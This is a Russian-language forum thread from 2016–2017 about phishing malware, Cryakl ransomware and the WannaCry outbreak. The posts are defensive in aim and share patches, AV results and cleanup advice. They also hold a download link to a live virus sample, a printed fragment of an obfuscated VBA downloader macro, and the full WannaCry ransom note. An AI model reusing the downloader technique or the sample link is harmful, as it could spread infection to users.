Автор Тема: Внимание. Вирус!  (Прочитано 19815 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Наиль Ильбарович

  • ***
  • Сообщений: 7414
    • Просмотр профиля
#105: 17 Марта 2016, 00:38:08
Во-первых, банк может перевезти свои серверы в другой ЦОД, где другие провайдеры с другими IP-адресами. Во-вторых, в приличных организациях прокси-серверы нещадно режут выход в интернет, если в HTTP-запросе указан IP-адрес, а не доменное имя.
вы серьёзно? Банк хранит свои базы в чьём то облаке? И процессинг тоже на чужих ресурсах?

akar

  • ***
  • Сообщений: 663
    • Просмотр профиля
#106: 17 Марта 2016, 08:24:52
вы серьёзно? Банк хранит свои базы в чьём то облаке? И процессинг тоже на чужих ресурсах?
Нет. Я говорил о физической перевозке серверов и прочего оборудования на грузовике/самолёте из одного своего или арендуемого помещения в другое. Ну или миграция виртуальных машин. Такое бывает далеко не каждый день, но всё-таки. Например, два года назад Восточный экспресс переезжал. Погуглите "банк переезд ЦОД", увидите список смелых.

Наиль Ильбарович

  • ***
  • Сообщений: 7414
    • Просмотр профиля
#107: 17 Марта 2016, 10:31:11
akar,
 При криворукости и головожопости можно и не такие схемы "надежности и безопасности" замутить.
 Именно замутить, а не сделать.
Хостить свои виртуалки на чужих ресурсах- это просто тупо отдать серверА для вдумчивого и неспешного  взлома всеми желающими..
 ===========
Также-если используются свои ресурсы, то и IP предполагаю должны быть зарезервированы. И не 1-5. А от сотни и выше.

 Маршрутизацию диапазона IP с лёгкостью настроит ЛЮБОЙ вменяемый провайдер.
Тем более такому "жирному" клиенту, как банк.

 А если не сможет, то  фтопку такого провайдера.
===========
 Для того что бы всякие переезды и миграции не были "внезапными", существует такое понятие "План восстановления".

 Если его нет, тогда ой...
Всё руководство IT отдела надо отправлять пасти коров...



Wolf_Hunter

  • ***
  • Сообщений: 1010
    • Просмотр профиля
#108: 17 Марта 2016, 12:06:52
Во-первых, банк может перевезти свои серверы в другой ЦОД, где другие провайдеры с другими IP-адресами. Во-вторых, в приличных организациях прокси-серверы нещадно режут выход в интернет, если в HTTP-запросе указан IP-адрес, а не доменное имя.
Но мы отвлеклись. Изначальный вопрос был о том, как мобильное приложение отреагирует, если оно пытается подключиться к банк.ру, а в ответ поступает цифровой сертификат сервера мошенник.ру? Ну или подключается к 11.22.33.44, а приходит сертификат для 55.66.77.88? Или же приложение это не проверяет, оставляя на совести операционной системы смартфона? Браузер в такой ситуации напишет, что "эй, гражданина, ты туда не ходи", и пользователь это увидит.
Я понимаю ваше негодование, но есть вещи которые я вам не расскажу, не примите за дерзость. Просто есть определенные моменты информационной безопасности не подлежащие разглашению, ибо могут быть использованы для дальнейшей возможности их обхода. Приложение достаточно обучено подобным приемам, раз уж даже вы о них знаете, и в случае подобных ситуаций отреагирует адекватно.

KenshiN

  • ***
  • Сообщений: 7556
    • Просмотр профиля
#109: 08 Июля 2016, 16:57:43
Пришло сегодня с адреса client.email@r-investik.biz



http://dropmefiles.com/NH14g  сам вирус, будьте внимательны.

t278

  • *
  • Сообщений: 63
    • Просмотр профиля
#110: 08 Июля 2016, 17:57:46
подобные сообщения с сентября 2015 в корпоративной почте вижу.

kim

  • ***
  • Сообщений: 2719
    • Просмотр профиля
#111: 08 Июля 2016, 19:16:19

Tolyani

  • ***
  • Сообщений: 1277
    • Просмотр профиля
#112: 08 Июля 2016, 20:00:59
подобные сообщения с сентября 2015 в корпоративной почте вижу.


Подобные письма пару раз в этом году встречались. И самое забавное - в майле пишет - проверено, вирусов нет)
Антивирусы только через пару дней/неделю начинают узнавать что это вирус.


А у некоторых знакомых в этом году вирус успешно всё шифранул

akar

  • ***
  • Сообщений: 663
    • Просмотр профиля
#113: 08 Июля 2016, 20:03:02
KenshiN, это практически баян - шифровальщик-вымогатель Cryakl, защитник винды его определил влёт. Сегодня вечером мне пришёл очередной вордовский файл с обфусцированными макросами, на VirusTotal ожидаемо 6 из 52. Вот кусок кода (спасибо Didier Stevens за его oledump) :
Public Function MapNetDrive(ByVal NetDrive As String, ByVal ServerPath As String) As Integer
 nsGadget = Split("166433221116661856332211166618563322111666179233221116669283322111666752332211166675233221116661632332211166616163322111666172833221116661680332211166615843322111666161633221116661584332211166618243322111666161633221116661744332211166616163322111666184033221116661680332211166617603322111666168033221116667363322111666158433221116661776332211166617443322111666752332211166689633221116668803322111666193633221116661648332211166684833221116661632332211166616003322111666848", "3322111666")
 Dim whatisdas As String
whatisdas = mashina("1001icro10001oft.X1001LHTTP100001Adodb.10001tr101a100110000110001h101ll.Application100001W10001cript.10001h101ll100001Proc1011000110001100001G101T100001T1011001P100001Typ101100001op101n100001writ101100001r10110001pon10001101Body10000110001av101tofil101100001\fidru10001ko.101x101", "101", "e")
 whatisdas = mashina(whatisdas, "1001", "M")
 whatisdas = mashina(whatisdas, "10001", "s")
 somebodyBloody = Split(whatisdas, "100001")
 Set somebodySaloEst = CreateObject(somebodyBloody(1))
 Set hasHasHas_to_fiddle = CreateObject(somebodyBloody(2))
 If Application = "Microsoft Word" Then

' Check for Drive Specification Error
GetAbbr "", "", "", "91", ""
End If
Exit Function

Riconet_07

  • ***
  • Сообщений: 3231
    • Просмотр профиля
#114: 08 Июля 2016, 21:09:49
Dr. web его крякнул!

KenshiN

  • ***
  • Сообщений: 7556
    • Просмотр профиля
#115: 08 Июля 2016, 21:51:35
kim,
Интересно, спасибо.


Tolyani,


Подобные письма пару раз в этом году встречались. И самое забавное - в майле пишет - проверено, вирусов нет)
Антивирусы только через пару дней/неделю начинают узнавать что это вирус.
А у некоторых знакомых в этом году вирус успешно всё шифранул
1С на ура и в бюджетных орг-ях, и скрывают....и деньги даже платят....

akar,
На свежесть не претендую, но если хотя бы одному поможет, уже не зря.

Riconet_07,
У меня сидел вирус, который сам по глупости и установил. Никакие вебы не справлялись. Не, по факту то он отчитывается, но после третьей перезагрузки почему то вновь появлялся.
Помогли ребята с небезызвестного форума, чистили скриптами через AVZ и иже с ним. 

Riconet_07

  • ***
  • Сообщений: 3231
    • Просмотр профиля
#116: 08 Июля 2016, 22:09:54
KenshiN, Я конечно не агитирую, но с Вебом подобная процедура была..
Поймал както вирус, он его видел, удалял, но не вычищал.. И кажую перезагрузку заново..
Обратился в техподдержку, выслали прогу, просканил, прикрепил им отчет и на след. день с обновлением вирус помер окончательно..

kim

  • ***
  • Сообщений: 2719
    • Просмотр профиля
#117: 08 Июля 2016, 23:17:10
Не, по факту то он отчитывается, но после третьей перезагрузки почему то вновь появлялся.


Поймал както вирус, он его видел, удалял, но не вычищал.. И кажую перезагрузку заново..

Для успешного лечения необходимо загружать комп НЕ зараженной - чистой операционной системой, например,  с лайвсиди или флешки доктора Веба.
Бесполезно загружать ОС с вирусом - якобы успешное удаление будет в отчете, но вирус восстановится со следующей загрузкой ОС.
Рекомендую -  http://www.freedrweb.ru/livedisk/  с дефолтными настройками лечит на 5 баллов.

Flamen

  • ***
  • Сообщений: 281
    • Просмотр профиля
#118: 08 Июля 2016, 23:26:32
Для успешного лечения необходимо загружать комп НЕ зараженной - чистой операционной системой, например,  с лайвсиди или флешки доктора Веба. Бесполезно загружать ОС с вирусом - якобы успешное удаление будет в отчете, но вирус восстановится со следующей загрузкой ОС. Рекомендую -  http://www.freedrweb.ru/livedisk/  с дефолтными настройками лечит на 5 баллов.
а антивирус Попова его побеждает?

akar

  • ***
  • Сообщений: 663
    • Просмотр профиля
#119: 09 Июля 2016, 10:26:18
Отправлял вчерашний макровирус разработчикам Касперского и в Майкрософт, результаты:
Цитата: Вирлаб Касперского
В присланном Вами файле обнаружено новое вредоносное программное обеспечение.
Его детектирование будет включено в очередное обновление антивирусных баз.
Благодарим за оказанную помощь.
Trojan-Downloader.MSWord.Cryptoload.g
Цитата: Вирлаб Microsoft
Submission ID MMPC16070867310791       
  Submitted Files       
  =============================================
  60F6E3B2A1394.docm [TrojanDownloader:O97M/Donoff]
На вирустотал уже получше - https://virustotal.com/ru/file/83a82c35b6bad6275f426017dc03166d7569e69c8e80c9d2ce8232cb5b3f36e1/analysis/

_Ranger_

  • ***
  • Сообщений: 672
    • Просмотр профиля
#120: 10 Июля 2016, 12:28:46
Сервис ОТПРАВИТЬ ВО ВСЕ ВИРЛАБЫ еще не придумали?

KenshiN

  • ***
  • Сообщений: 7556
    • Просмотр профиля
#121: 10 Июля 2016, 12:37:24
kim

Вычищаемый мной вирус противостоял загрузочной флешке от Касперского очень легко. Удалить его получилось после 2го сделанного на основе логов скрипта. Объективно раз на раз не приходится.
И, кстати, вирус обнаружила китайская игрушка CoD online и не давала авторизоваться. Так получилось что есть у меня игрок живший в китае и играющий в китайские игры))

akar

  • ***
  • Сообщений: 663
    • Просмотр профиля
#122: 10 Июля 2016, 16:29:32
Сервис ОТПРАВИТЬ ВО ВСЕ ВИРЛАБЫ еще не придумали?
А толку-то? Посмотрите на кусок кода этого трояна - можно вносить массу однотипных косметических изменений, которые не влияют на его работу, но влияют на определение через базы сигнатур. Вся надежда на эвристический анализ и либо ограничение неизвестным программам доступа к важным документам и файлам, либо полный запрет запуска всего неизвестного.

starco

  • *****
  • Сообщений: 20044
    • Просмотр профиля
#123: 13 Мая 2017, 10:30:28
Красота-то какая

https://intel.malwaretech.com/WannaCrypt.html



12 мая около 18:00 по московскому времени в СМИ и социальных сетях появились сообщения о вирусах-вымогателях, которые требуют выкуп за сохранение информации на захваченных машинах.

Крупной хакерской атаке подверглись корпоративные компьютеры в России, США, Китае, Испании, Италии, Великобритании, а также в ряде азиатских стран, таких как Вьетнам и Тайвань. Уязвимыми оказались машины, работающие на базе операционной системы Windows.

В России атаке подверглась ИСОД МВД в нескольких регионах. Сеть ведомства оказалась заблокирована. Кроме того, хакеры завладели электронной поддержкой системы здравоохранения в Великобритании, заблокировав электронный документооборот. Атаке также подверглись серверы американской почтовой компании FedEx, в результате чего возникли неполадки с некоторыми системами.

https://life.ru/t/%D1%82%D0%B5%D1%85%D0%BD%D0%BE%D0%BB%D0%BE%D0%B3%D0%B8%D0%B8/1007324/rzhd_i_yota_moghli_stat_zhiertvami_kibierataki



igormigorm

  • ***
  • Сообщений: 1791
    • Просмотр профиля
#124: 13 Мая 2017, 10:52:09
Я один на амите поймал  вирус WannaCry?


Зашифровал процентов 30 jpg, pdf, txt


И во всех папках появился файл - @Please_Read_Me@.txt

Q:  What's wrong with my files?


A:  Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
    If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
    Let's start decrypting!


Q:  What do I do?


A:  First, you need to pay service fees for the decryption.
    Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94


    Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software.
    Run and follow the instructions! (You may need to disable your antivirus for a while.)
   
Q:  How can I trust?


A:  Don't worry about decryption.
    We will decrypt your files surely because nobody will trust us if we cheat users.
   


*   If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.

AT

  • ***
  • Сообщений: 6124
    • Просмотр профиля
#125: 13 Мая 2017, 10:55:02
Как выловил?

igormigorm

  • ***
  • Сообщений: 1791
    • Просмотр профиля
#126: 13 Мая 2017, 11:12:19
Как выловил?
Скачал прогу HitmanPro и выловил

Makc[666]

  • ***
  • Сообщений: 5844
    • Просмотр профиля
#127: 13 Мая 2017, 11:19:48
igormigorm,
С офф сайта?

igormigorm

  • ***
  • Сообщений: 1791
    • Просмотр профиля
#128: 13 Мая 2017, 11:24:54
igormigorm,
С офф сайта?
да. месяц бесплатно

Wolf_Hunter

  • ***
  • Сообщений: 1010
    • Просмотр профиля
#129: 13 Мая 2017, 11:38:15
Сцуко, лезет по SMB v1


MaksVJ

  • ***
  • Сообщений: 593
    • Просмотр профиля
#131: 14 Мая 2017, 08:14:22
http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
обновления для старых не поддерживаемых систем (например, windows XP)

t278

  • *
  • Сообщений: 63
    • Просмотр профиля
#132: 14 Мая 2017, 10:39:27
что завтра ждёт на работе меня (нас) ???

akar

  • ***
  • Сообщений: 663
    • Просмотр профиля
#133: 14 Мая 2017, 11:26:11
что завтра ждёт на работе меня (нас) ???
Как минимум это - http://support.kaspersky.ru/10905#block2

fluf

  • ***
  • Сообщений: 7127
    • Просмотр профиля
    • http://forum.amur.ru
#134: 14 Мая 2017, 11:39:13
Странно что для всех это такой нежданчик.

Еще месяц назад в тестовой лабе когда игрался с публичным эксплойтом Eternalblue + doublepulsar, поразился насколько все и просто и эффективно крякается.
И подумал тогда - а чего народ не кипишит в интернетах и не бьет в набат.

sky star

  • *****
  • Сообщений: 17902
    • Просмотр профиля

integro

  • ***
  • Сообщений: 1371
    • Просмотр профиля
#136: 14 Мая 2017, 11:47:08
а чего народ не кипишит в интернетах и не бьет в набат.

пока в нашей раше информационной безопасностью занимаются ex. менты на пенсии , вся эта красота будет регулярно находится в топах новостных сайтов
P.S.
У ментов доблестной полиции есть
1. лицензонный KAV
2.внутренние правила безопасности чего-то там.
Но очевидно шифровальщики про это не знают, судя по по тому что часть сети мвд легла на погоны тех, кто должен ей беречь и соблюдать.

akar

  • ***
  • Сообщений: 663
    • Просмотр профиля
#137: 14 Мая 2017, 11:51:11
WannaCry не умеет ходить к своему сайту-выключальщику через прокси - https://blog.didierstevens.com/2017/05/13/quickpost-wcry-killswitch-check-is-not-proxy-aware/.

fluf

  • ***
  • Сообщений: 7127
    • Просмотр профиля
    • http://forum.amur.ru
#138: 14 Мая 2017, 12:00:33
пока в нашей раше

Да фигня. Конкртено тут ты уже притягиваешь шар на глобус.
Во всем мире так.

Вот опять же когда я эксплойт изучал, поразился что антивирус, просто промолчал.
Обновленный антивирус!
Т.е. уязвимости уже два месяца, эксплойту  недели две, он добавлен во все какие можно метасплойты, а AV молчит.

Как так то? Более того, если AV блочит мимикатц залитый как файл, то втиснутый через Даблпульсар тот же мимикатц прекрасно запускается и работает.
Хрень какая то а не эвристика. Или заговор.

AV вендоры поняли, что грядет эпидемия, на волне которой можно приподнять продажи, и не торопились..
 

Voodoo Doll

  • ***
  • Сообщений: 1298
    • Просмотр профиля
#139: 14 Мая 2017, 12:19:16
Цитата: fluf
AV вендоры поняли, что грядет эпидемия, на волне которой можно приподнять продажи, и не торопились..
Вывод - надо написать свой ÿбер гига антивирус, с дамами и картишками, неподвластный заговорам злых вендоров.

 

kompas